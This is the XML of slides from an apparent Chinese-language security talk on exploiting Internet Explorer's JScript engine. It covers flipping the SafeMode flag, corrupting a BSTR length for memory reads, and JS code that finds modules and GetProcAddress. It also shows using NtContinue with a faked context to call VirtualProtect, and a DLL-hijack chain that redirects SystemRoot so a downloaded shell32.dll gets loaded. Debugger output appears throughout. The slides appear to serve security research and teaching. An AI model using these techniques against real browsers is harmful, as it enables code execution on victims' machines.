            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="37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6600" y="2971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dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>那么，区别在哪？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5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sz="5200" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5200" dirty="0" smtClean="0"/>
              <a:t> 对象中的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5200" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5200" dirty="0" err="1" smtClean="0"/>
              <a:t>SafeMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5200" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5200" dirty="0" smtClean="0"/>
              <a:t> 开关</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5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75345" y="2394973"/>
            <a:ext cx="10308655" cy="299158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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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0x1D4, 0x1E4 or 0x1F4 in JScript 9,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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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0x188 or 0x184 in JScript 5.8, depends on versions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safemode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*(DWORD *)(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jsobj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+ 0x188); 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if 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safemode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&amp; 0xB == 0 )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48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Turn_on_God_Mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="48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397000" y="167640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伪代码：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留给大家的问题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4800" dirty="0" smtClean="0"/>
              <a:t>如何定位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript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对象？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>如何读取 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript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对象当其地址低于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t> BSTR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> 时？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>IE 11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> 后的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t> 9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> 对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>SafeMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> 做了保护，如何绕过？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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20111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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>BSTR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35000" y="1371600"/>
            <a:ext cx="1173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JScript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5.8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 及其之前版本用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BSTR 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来存储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对象的数据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11200" y="3886200"/>
            <a:ext cx="11582400" cy="2514600"/>
            <a:chOff x="412304" y="4302078"/>
            <a:chExt cx="8856984" cy="2514600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="组合 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="412304" y="4302078"/>
              <a:ext cx="8856984" cy="2514600"/>
              <a:chOff x="412304" y="2933926"/>
              <a:chExt cx="8856984" cy="2514600"/>
            </a:xfrm>
          </p:grpSpPr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412304" y="2933926"/>
                <a:ext cx="8856663" cy="4678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25400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
              <a:extLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="97530" tIns="48765" rIns="97530" bIns="48765">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="97529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err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1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var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 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1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str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 = “AAAAAAAA”;</a:t>
                </a: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412304" y="4242048"/>
                <a:ext cx="8856984" cy="1206478"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="25400" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="8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7530" tIns="48765" rIns="97530" bIns="48765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FF00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0:016&gt; dc 120d0020 l 8</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="00FF00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120d0020 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00000010</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="00FF00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 00410041 00410041 00410041  ....A.A.A.A.A.A.</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="00FF00"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                    <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
                    <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>120d0030  00410041 00000000 00000000 00000000  A.A.............</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty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27" name="下箭头 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4491178" y="4941022"/>
              <a:ext cx="648072" cy="504056"/>
            </a:xfrm>
            <a:prstGeom prst="down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11200" y="2057400"/>
            <a:ext cx="11581980" cy="1575810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BSTR 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LONG length;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WCHAR*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304" y="2267872"/>
            <a:ext cx="6264696" cy="3861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939800" y="762000"/>
            <a:ext cx="1112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即使解决了所有问题，能够成功调用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WScript.Shell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zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 执行程序，还是会弹出这个警告窗：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51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zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpReques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对象下载一个动态链接库，文件会被临时存放在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>缓存目录。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zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> 对象搜索 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> 缓存目录，找到这个动态链接库。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zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> 对象创建名为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>System32”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>的目录，将动态链接库拷贝到里面，文件名设为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>shell32.dll”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>。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zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>对象将当前进程的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>SystemRoot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环境变量指向刚才创建的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>System32”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>目录的的上一级目录。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zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>创建 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>Shell.Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> 对象。这会让浏览器加载“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>SystemRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>%\System32\shell32.dll”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean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28893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点穴攻击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Windows XP ~ Windows 8.1 / IE 6 ~ IE 11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甚至不需要编写任何机器指令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0048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79886" y="282714"/>
            <a:ext cx="3605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rgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨维交互执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”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000" dirty="0" smtClean="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" dirty="0" err="1" smtClean="0"/>
              <a:t>GetBaseAddrByPoiAddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="1447800"/>
            <a:ext cx="1158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/>
              <a:t>即使在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t> ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> 环境下，模块地址也是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>0x10000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>对齐的，所以可根据任意指针找到模块基址：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3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1200" y="2667000"/>
            <a:ext cx="11582400" cy="342246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function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GetBaseAddrByPoiAddr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PoiAddr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BaseAddr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BaseAddr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PoiAddr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&amp; 0xFFFF0000;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while(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BaseAddr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     != 0x0090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5A4D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|| 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(BaseAddr+0xC) != 0x0000FFFF   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BaseAddr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-= 0x10000;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}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return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BaseAddr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000" dirty="0" smtClean="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" dirty="0" err="1" smtClean="0"/>
              <a:t>GetModuleFromImport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="50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2590800"/>
            <a:ext cx="11582400" cy="342246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function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GetModuleFromImport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ModuleName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p   = 0;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pImport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  // PIMAGE_IMPORT_DESCRIPTOR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p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+ 0x3C); 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p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p + 0x80);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pImport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p;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while(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(pImport+0x0C) != 0 )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711200" y="1701225"/>
            <a:ext cx="1158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通过读取模块的导入表，找到表中的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>kernel32.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>等模块：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2819400"/>
            <a:ext cx="11582400" cy="305313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function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GetProcAddress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ProcName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FuncAddr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pExport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pNameBase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AddressOfNameOrdinals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p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+ 0x3C);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p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p + 0x78);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pExport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LibAddr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p;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NumberOfNames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readDword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pExport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+ 0x18);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711200" y="1752600"/>
            <a:ext cx="1158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/>
              <a:t>通过读取导出表，实现 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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2878794"/>
            <a:ext cx="11582400" cy="2683806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jscript9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GetBaseAddrByPoiAddr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jsobj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kernel32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GetModuleFromImport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("kernel32.dll", jscript9);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ntdll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GetModuleFromImport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("ntdll.dll", kernel32);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VirtualProtect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GetProcAddress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(kernel32,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VirtualProtect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GetProcAddress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(kernel32,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NtContinue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GetProcAddress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ntdll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NtContinue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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1473200" y="1676400"/>
            <a:ext cx="104166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200" dirty="0" smtClean="0"/>
              <a:t>可以像写 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4200" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4200" dirty="0" smtClean="0"/>
              <a:t> 代码一样在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4200" dirty="0" smtClean="0"/>
              <a:t>JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4200" dirty="0" smtClean="0"/>
              <a:t>中使用这些函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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NtContinue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1200" y="3541455"/>
            <a:ext cx="1158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NtContinue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可以控制包括 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> 和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> 在内的所有寄存器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NtContinue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> 第二参数的值无关紧要</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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1200" y="1600200"/>
            <a:ext cx="11582400" cy="1575810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NTSTATUS NTAPI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NtContinue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(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IN PCONTEXT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ThreadContext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,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IN BOOLEAN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RaiseAlert</a:t>
            </a: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_CONTEXT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16000" y="1600200"/>
            <a:ext cx="11049000" cy="4530465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#define CONTEXT_i386    0x00010000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#define CONTEXT_CONTROL (CONTEXT_i386|0x00000001L)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#define CONTEXT_INTEGER (CONTEXT_i386|0x00000002L)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_CONTEXT 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ULONG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ContextFlags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ULONG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Eip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ULONG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SegCs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ULONG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EFlags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ULONG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Esp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篡改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> BSTR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>长度域前缀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11200" y="4637586"/>
            <a:ext cx="11582400" cy="1306014"/>
            <a:chOff x="711200" y="4419600"/>
            <a:chExt cx="11582400" cy="1306014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11200" y="5257800"/>
              <a:ext cx="11582400" cy="4678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>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
            <a:effectLst/>
            <a:extLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="97530" tIns="48765" rIns="97530" bIns="48765">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/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var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outofbounds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=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str.substr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(0x22222200,4);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11200" y="4419600"/>
              <a:ext cx="11582400" cy="837146"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="2540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7530" tIns="48765" rIns="97530" bIns="48765">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/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0:016&gt; dc 120d0020 l 4</a:t>
              </a:r>
            </a:p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120d0020 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7ffffff0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00410041 00410041 00410041  ....A.A.A.A.A.A.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7104" y="3429000"/>
            <a:ext cx="11576496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writeByVul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(0x120d0020, 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0x7ffffff0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0" name="下箭头 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045200" y="2848744"/>
            <a:ext cx="876672" cy="427856"/>
          </a:xfrm>
          <a:prstGeom prst="down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11200" y="1371600"/>
            <a:ext cx="11582400" cy="1306014"/>
            <a:chOff x="711200" y="1600200"/>
            <a:chExt cx="11582400" cy="130601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11200" y="2069068"/>
              <a:ext cx="11582400" cy="837146"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="2540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7530" tIns="48765" rIns="97530" bIns="48765">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/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0:016&gt; dc 120d0020 l 4</a:t>
              </a:r>
            </a:p>
            <a:p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120d0020  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00000010</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="00FF00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00410041 00410041 00410041  ....A.A.A.A.A.A.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711200" y="1600200"/>
              <a:ext cx="11581980" cy="4678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>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
            <a:effectLst/>
            <a:extLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="97530" tIns="48765" rIns="97530" bIns="48765">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="97529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var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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1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str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onsolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = “AAAAAAAA”;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4368800" y="61838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* Peter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vreugdenhil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, “Pwn2Own 2010 Windows 7 Internet Explorer 8 exploit”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="下箭头 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045200" y="4067944"/>
            <a:ext cx="876672" cy="427856"/>
          </a:xfrm>
          <a:prstGeom prst="down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对象操作引发的调用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1371600"/>
            <a:ext cx="11582400" cy="1206478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0:019&gt; dc 14162050                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF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14162050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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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681b4534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035f46a0 00000000 00000005  4E.h.F_.........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14162060  00000001 14162078 14162078 00000000  ....x ..x ......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200" y="3886200"/>
            <a:ext cx="11582400" cy="2314474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eax=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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681b4534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ebx=00000000 ecx=14162050 edx=14162050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esi=02da4b80 edi=00000073 eip=681bda81 esp=03ddab84 Js::JavascriptOperators::GetProperty_Internal&lt;0&gt;+0x4c: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681bda81 ff5040 call  dword ptr [eax+40h]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0:007&gt; dc esp                                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03ddab84  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF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14162050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00000073 03ddabdc 00000000  P ..s...........</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="下箭头 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5969000" y="3429000"/>
            <a:ext cx="990600" cy="381000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11200" y="2819400"/>
            <a:ext cx="11582400" cy="46781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n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intArr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].length;  // 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 a function pointer call</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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一数两用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200" y="1295400"/>
            <a:ext cx="11582400" cy="4899797"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="254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eax=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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12161003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ebx=00000000 ecx=14162050 edx=14162050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esi=02da4b80 edi=00000073 eip=681bda81 esp=03ddab84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681bda81 ff5040 call  dword ptr [eax+40h]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0:019&gt; dds eax+40 l 1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12161043  770ffef0 ntdll!NtContinue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0:019&gt; dc esp                                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03ddab84  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF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14162050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00000073 03ddabdc 00000000  P ..s...........</a:t>
            </a:r>
          </a:p>
          <a:p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0:019&gt; dc 14162050</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF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14162050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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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12161003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00000000 00000000 00000000  ................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0:019&gt;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dt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_CONTEXT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ContextFlags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Eip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Esp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14162050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+0x000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ContextFlags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: 0x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12161003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+0x0b8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Eip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   : 0x75f310c8 //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VirtualProtect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00FF00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+0x0c4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1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Esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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   : 0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF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14180000 // faked stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00FF00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伪造 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ThreadContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 结构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2200" y="1524000"/>
